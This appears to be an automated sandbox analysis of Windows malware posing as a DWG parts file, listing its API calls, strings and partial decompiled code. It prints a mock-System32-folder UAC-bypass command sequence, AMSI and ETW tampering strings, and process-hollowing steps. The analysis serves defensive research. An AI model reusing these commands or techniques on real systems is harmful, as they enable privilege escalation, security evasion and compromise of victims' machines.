                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                • Sleep.KERNEL32(00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528A4C
                                                                • DeleteFileA.KERNEL32(00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528A80
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528ABA
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528AF4
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe), ref: 02528B2E
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60), ref: 02528B68
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat), ref: 02528B9C
                                                                • WinExec.KERNEL32 ref: 025294FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C,UacScan), ref: 02529520
                                                                • NtSuspendProcess.N(00000000,001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C), ref: 02529530
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                  • Part of subcall function 02524F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 025248A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                  • Part of subcall function 025248A4: GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                  • Part of subcall function 025248A4: ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                  • Part of subcall function 025248A4: NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                  • Part of subcall function 025248A4: VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,Initialize,0252AD5C,OpenSession,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,OpenSession,0252AD5C,0252B044), ref: 0252A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressAttributesContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait_lclose_lcreat_lwrite
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$KDECO.bat$NotifyChangeEventLog$NtCreateFile$NtOpenFile$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$easinvoker.exe$iexpress$iexpress.exe$kernel32$mkdir "\\?\C:\Windows " mkdir "\\?\C:\Windows \System32"ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y"C:\Wi$netutils.dll$ntdll$shell32
                                                                • API String ID: 1536863316-3406292098
                                                                • Opcode ID: df91074bbf354d9cdb58d88f77fc67a9fe89313c42c6cff5ff8fd80ebe227523
                                                                • Instruction ID: 7bbc793d8b09a6fe38c3741049169c694ce04be8bd2a3052cb186e83b37003b7
                                                                • Opcode Fuzzy Hash: df91074bbf354d9cdb58d88f77fc67a9fe89313c42c6cff5ff8fd80ebe227523
                                                                • Instruction Fuzzy Hash: FBF2D075B0112A9BEB10EB54D880ADE73B7FFC5300F5199E69008A7290DE34AE89DF5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02528285 Relevance: 124.2, APIs: 11, Strings: 59, Instructions: 1669filesleepprocessCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2947 2528285-2528322 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514d64 call 2514a98 call 2518110 2968 2528baa-2529004 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2525580 call 25148f4 call 2517da0 call 2525b34 call 25148f4 call 2525ac0 call 2525910 call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 2947->2968 2969 2528328-2528530 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514d64 call 25137ac call 2525724 Sleep call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA 2947->2969 3156 252900a-2529019 call 2514cb0 2968->3156 3157 252934e-25293d6 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 2968->3157 2969->2968 3156->3157 3162 252901f-252902e call 2514cb0 3156->3162 3191 2529841-25298c9 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 3157->3191 3192 25293dc-25293eb call 2514cb0 3157->3192 3162->3157 3168 2529034-2529349 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514dbc call 2524f34 3162->3168 3168->3157 3242 2529a11-252a7b3 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc ExitProcess 3191->3242 3243 25298cf-25298de call 2514cb0 3191->3243 3192->3191 3201 25293f1-2529400 call 2514cb0 3192->3201 3201->3191 3210 2529406-252983c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc WinExec call 25245f8 OpenProcess NtSuspendProcess call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514dbc call 2523f94 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc 3201->3210 3210->3191 3243->3242 3254 25298e4-25298f3 call 2514cb0 3243->3254 3254->3242 3267 25298f9-2529a0c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2512fc4 call 2514dbc call 25248a4 3254->3267 3267->3242
                                                                C-Code - Quality: 51%
                                                                			E02528285(intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t563;
				void* _t568;
				intOrPtr _t611;
				intOrPtr _t615;
				void* _t616;
				intOrPtr _t617;
				intOrPtr _t621;
				intOrPtr _t697;
				intOrPtr _t713;
				intOrPtr _t729;
				intOrPtr _t1223;
				intOrPtr _t1225;
				void* _t1259;
				void* _t1260;
				intOrPtr _t1262;
				intOrPtr _t1264;
				long _t1297;
				intOrPtr _t1299;
				void* _t1315;
				intOrPtr _t1316;
				intOrPtr _t1395;
				intOrPtr _t1397;
				intOrPtr _t1507;
				intOrPtr _t1513;
				intOrPtr _t1521;
				intOrPtr _t1529;
				intOrPtr _t1537;
				intOrPtr _t1545;
				intOrPtr _t1553;
				intOrPtr _t1568;
				intOrPtr _t1569;
				intOrPtr _t1570;
				intOrPtr _t1571;
				intOrPtr _t1574;
				intOrPtr _t1575;
				intOrPtr _t1576;
				intOrPtr _t1577;
				intOrPtr _t1578;
				intOrPtr _t1579;
				intOrPtr _t1580;
				intOrPtr _t1581;
				intOrPtr _t1582;
				intOrPtr _t1583;
				intOrPtr _t1584;
				intOrPtr _t1585;
				intOrPtr _t1586;
				intOrPtr _t1587;
				intOrPtr _t1588;
				intOrPtr _t1591;
				intOrPtr _t1592;
				intOrPtr _t1593;
				intOrPtr _t1594;
				intOrPtr _t1595;
				intOrPtr _t1596;
				intOrPtr _t1597;
				intOrPtr _t1598;
				intOrPtr _t1599;
				intOrPtr _t1600;
				intOrPtr _t1601;
				intOrPtr _t1602;
				intOrPtr _t1603;
				intOrPtr _t1604;
				intOrPtr _t1605;
				void* _t1611;
				void* _t1617;
				void* _t1622;
				void* _t1627;
				intOrPtr _t1628;
				void* _t1639;
				void* _t1644;
				void* _t1649;
				void* _t1654;
				void* _t1659;
				void* _t1665;
				void* _t1671;
				void* _t1677;
				void* _t1680;
				void* _t1685;
				void* _t1688;
				void* _t1693;
				void* _t1696;
				void* _t1701;
				void* _t1704;
				void* _t1707;
				void* _t1712;
				void* _t1717;
				void* _t1720;
				void* _t1723;
				void* _t1726;
				void* _t1729;
				void* _t1732;
				void* _t1735;
				void* _t1738;
				void* _t1741;
				void* _t1744;
				void* _t1747;
				void* _t1750;
				void* _t1753;
				void* _t1756;
				void* _t1759;
				void* _t1762;
				void* _t1765;
				void* _t1768;
				void* _t1771;
				void* _t1774;
				void* _t1777;
				void* _t1780;
				void* _t1783;
				void* _t1786;
				void* _t1789;
				void* _t1792;
				void* _t1795;
				void* _t1798;
				void* _t1801;
				void* _t1804;
				void* _t1807;
				void* _t1810;
				void* _t1813;
				void* _t1816;
				void* _t1819;
				void* _t1822;
				void* _t1825;
				void* _t1828;
				void* _t1831;
				void* _t1834;
				void* _t1837;
				void* _t1842;
				void* _t1847;
				void* _t1850;
				void* _t1853;
				void* _t1856;
				void* _t1859;
				intOrPtr _t1860;
				intOrPtr _t1868;
				intOrPtr _t1870;
				intOrPtr _t1872;
				void* _t1882;
				void* _t1887;
				void* _t1896;
				void* _t1901;
				void* _t1906;
				void* _t1912;
				void* _t1915;
				void* _t1920;
				void* _t1923;
				void* _t1928;
				void* _t1931;
				void* _t1936;
				void* _t1943;
				void* _t1948;
				void* _t1953;
				void* _t1956;
				void* _t1961;
				void* _t1964;
				void* _t1969;
				void* _t1972;
				void* _t1977;
				void* _t1988;
				void* _t1996;

				_t1999 = __fp0;
				_t1987 = __esi;
				_t1986 = __edi;
				_t1561 = __ebx;
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x4d0, E02514D64( *((intOrPtr*)(_t1988 - 0x4d4))));
				_push( *((intOrPtr*)(_t1988 - 0x4d0)));
				_t1568 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x4dc, _t1568, 0x252ad5c);
				E02514A98(_t1988 - 0x4d8, E02514D64( *((intOrPtr*)(_t1988 - 0x4dc))));
				_pop(_t1611);
				E025236CC( *((intOrPtr*)(_t1988 - 0x4d8)), __ebx, _t1611, __esi);
				_t563 =  *0x256d8e8; // 0x0
				E02514A98(_t1988 - 0x4e0, E02514D64(_t563));
				_t568 = E02518110( *((intOrPtr*)(_t1988 - 0x4e0)));
				_t1990 = _t568;
				if(_t568 != 0) {
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanBuffer");
					E02514C24();
					E02514A98(_t1988 - 0x4e4, E02514D64( *((intOrPtr*)(_t1988 - 0x4e8))));
					_push( *((intOrPtr*)(_t1988 - 0x4e4)));
					_t1605 =  *0x256dcd8; // 0x2a51b38
					E02514BB0(_t1988 - 0x4f0, _t1605, 0x252ad5c);
					E02514A98(_t1988 - 0x4ec, E02514D64( *((intOrPtr*)(_t1988 - 0x4f0))));
					_pop(_t1977);
					E025236CC( *((intOrPtr*)(_t1988 - 0x4ec)), __ebx, _t1977, __esi);
					_t1507 =  *0x256d8e8; // 0x0
					E02514D64(_t1507);
					E025137AC();
					E02525724(_t1988 - 0x5f0, _t1561, 0, 0x252afa8, __edi, _t1987, _t1990, __fp0);
					Sleep(0x32c8);
					_t1513 =  *0x256d8e4; // 0x0
					E02514A98(_t1988 - 0x5f4, E02514D64(_t1513));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5f4));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
					asm("sbb eax, eax");
					_t1521 =  *0x256da54; // 0x0
					E02514A98(_t1988 - 0x5f8, E02514D64(_t1521));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5f8));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
					asm("sbb eax, eax");
					_t1529 =  *0x256da58; // 0x0
					E02514A98(_t1988 - 0x5fc, E02514D64(_t1529));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5fc));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
					asm("sbb eax, eax");
					_t1537 =  *0x256dcd4; // 0x0
					E02514A98(_t1988 - 0x600, E02514D64(_t1537));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x600));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
					asm("sbb eax, eax");
					_t1545 =  *0x256d8ec; // 0x0
					E02514A98(_t1988 - 0x604, E02514D64(_t1545));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x604));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
					asm("sbb eax, eax");
					_t1553 =  *0x256d8e8; // 0x0
					E02514A98(_t1988 - 0x608, E02514D64(_t1553));
					_t1561 =  *((intOrPtr*)(_t1988 - 0x608));
					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x608));
					_t1996 = DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230)))) - 1;
					asm("sbb eax, eax");
				}
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t1988 - 0x6a4, E02514D64( *((intOrPtr*)(_t1988 - 0x6a8))));
				_push( *((intOrPtr*)(_t1988 - 0x6a4)));
				_t1569 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x6b0, _t1569, 0x252ad5c);
				E02514A98(_t1988 - 0x6ac, E02514D64( *((intOrPtr*)(_t1988 - 0x6b0))));
				_pop(_t1617); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x6ac)), _t1561, _t1617, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0x6b4, E02514D64( *((intOrPtr*)(_t1988 - 0x6b8))));
				_push( *((intOrPtr*)(_t1988 - 0x6b4)));
				_t1570 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x6c0, _t1570, 0x252ad5c);
				E02514A98(_t1988 - 0x6bc, E02514D64( *((intOrPtr*)(_t1988 - 0x6c0))));
				_pop(_t1622); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x6bc)), _t1561, _t1622, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x6c4, E02514D64( *((intOrPtr*)(_t1988 - 0x6c8))));
				_push( *((intOrPtr*)(_t1988 - 0x6c4)));
				_t1571 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x6d0, _t1571, 0x252ad5c);
				E02514A98(_t1988 - 0x6cc, E02514D64( *((intOrPtr*)(_t1988 - 0x6d0))));
				_pop(_t1627); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x6cc)), _t1561, _t1627, _t1987); // executed
				_t1628 =  *0x256dd00; // 0x2a1f418
				_t611 =  *0x256da80; // 0x7f190018, executed
				E02525580(_t611, _t1561, _t1988 - 0x6d4, _t1628, _t1986, _t1987); // executed
				E025148F4(0x256da48,  *((intOrPtr*)(_t1988 - 0x6d4)));
				_t615 =  *0x256dcf0; // 0x2a51bb8
				_t616 = E02517DA0(_t615, _t1996);
				_t1573 = _t1988 - 0x6d8;
				_t617 =  *0x256da48; // 0x7f210018
				E02525B34(_t617, _t1561, _t1988 - 0x6d8, _t616, _t1987);
				E025148F4(0x256da4c,  *((intOrPtr*)(_t1988 - 0x6d8)));
				_t621 =  *0x256da4c; // 0x7f110018
				E02525AC0(_t621, _t1561, _t1988 - 0x6d8, _t1988 - 0x6e0, _t1986, _t1987);
				E02525910( *((intOrPtr*)(_t1988 - 0x6e0)), _t1573, _t1988 - 0x6dc);
				E025148F4(0x256da84,  *((intOrPtr*)(_t1988 - 0x6dc)));
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("Initialize");
				E02514C24();
				E02514A98(_t1988 - 0x6e4, E02514D64( *((intOrPtr*)(_t1988 - 0x6e8))));
				_push( *((intOrPtr*)(_t1988 - 0x6e4)));
				_t1574 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x6f0, _t1574, 0x252ad5c);
				E02514A98(_t1988 - 0x6ec, E02514D64( *((intOrPtr*)(_t1988 - 0x6f0))));
				_pop(_t1639); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x6ec)), _t1561, _t1639, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t1988 - 0x6f4, E02514D64( *((intOrPtr*)(_t1988 - 0x6f8))));
				_push( *((intOrPtr*)(_t1988 - 0x6f4)));
				_t1575 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x700, _t1575, 0x252ad5c);
				E02514A98(_t1988 - 0x6fc, E02514D64( *((intOrPtr*)(_t1988 - 0x700))));
				_pop(_t1644); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x6fc)), _t1561, _t1644, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("UacScan");
				E02514C24();
				E02514A98(_t1988 - 0x704, E02514D64( *((intOrPtr*)(_t1988 - 0x708))));
				_push( *((intOrPtr*)(_t1988 - 0x704)));
				_t1576 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x710, _t1576, 0x252ad5c);
				E02514A98(_t1988 - 0x70c, E02514D64( *((intOrPtr*)(_t1988 - 0x710))));
				_pop(_t1649); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x70c)), _t1561, _t1649, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("UacInitialize");
				E02514C24();
				E02514A98(_t1988 - 0x714, E02514D64( *((intOrPtr*)(_t1988 - 0x718))));
				_push( *((intOrPtr*)(_t1988 - 0x714)));
				_t1577 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x720, _t1577, 0x252ad5c);
				E02514A98(_t1988 - 0x71c, E02514D64( *((intOrPtr*)(_t1988 - 0x720))));
				_pop(_t1654); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x71c)), _t1561, _t1654, _t1987); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t1988 - 0x724, E02514D64( *((intOrPtr*)(_t1988 - 0x728))));
				_push( *((intOrPtr*)(_t1988 - 0x724)));
				_t1578 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t1988 - 0x730, _t1578, 0x252ad5c);
				E02514A98(_t1988 - 0x72c, E02514D64( *((intOrPtr*)(_t1988 - 0x730))));
				_pop(_t1659); // executed
				E025236CC( *((intOrPtr*)(_t1988 - 0x72c)), _t1561, _t1659, _t1987);
				_t697 =  *0x256dcec; // 0x0
				E02514CB0(_t697, 0x252ae54);
				if(_t1996 == 0) {
					_t1395 =  *0x256dce4; // 0x2a51b88
					E02514CB0(_t1395, 0x252ae54);
					if(_t1996 != 0) {
						_t1397 =  *0x256dce8; // 0x0
						E02514CB0(_t1397, 0x252ae54);
						if(_t1996 != 0) {
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanBuffer");
							E02514C24();
							E02514A98(_t1988 - 0x734, E02514D64( *((intOrPtr*)(_t1988 - 0x738))));
							_push( *((intOrPtr*)(_t1988 - 0x734)));
							_t1600 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x740, _t1600, 0x252ad5c);
							E02514A98(_t1988 - 0x73c, E02514D64( *((intOrPtr*)(_t1988 - 0x740))));
							_pop(_t1943);
							E025236CC( *((intOrPtr*)(_t1988 - 0x73c)), _t1561, _t1943, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98(_t1988 - 0x744, E02514D64( *((intOrPtr*)(_t1988 - 0x748))));
							_push( *((intOrPtr*)(_t1988 - 0x744)));
							_t1601 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x750, _t1601, 0x252ad5c);
							E02514A98(_t1988 - 0x74c, E02514D64( *((intOrPtr*)(_t1988 - 0x750))));
							_pop(_t1948);
							E025236CC( *((intOrPtr*)(_t1988 - 0x74c)), _t1561, _t1948, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push(0x252b020);
							_push(0);
							_push(0x252b02c);
							_push(0);
							_push(0x252b038);
							_push(0);
							_push(0x252b044);
							E02514C24();
							E02514A98(_t1988 - 0x754, E02514D64( *((intOrPtr*)(_t1988 - 0x758))));
							_push( *((intOrPtr*)(_t1988 - 0x754)));
							_t1602 =  *0x256dcd8; // 0x2a51b38
							E02514BB0(_t1988 - 0x760, _t1602, 0x252ad5c);
							E02514A98(_t1988 - 0x75c, E02514D64( *((intOrPtr*)(_t1988 - 0x760))));
							_pop(_t1953);
							E025236CC( *((intOrPtr*)(_t1988 - 0x75c)), _t1561, _t1953, _t1987);
							E02514A98(_t1988 - 0x764, "ReportEventA");
							_push( *((intOrPtr*)(_t1988 - 0x764)));
							E02514A98(_t1988 - 0x768, "advapi32");
							_pop(_t1956);
							E025236CC( *((intOrPtr*)(_t1988 - 0x768)), _t1561, _t1956, _t1987);
							_push(0x252ad5c);
							_push( *0x256dcd8);
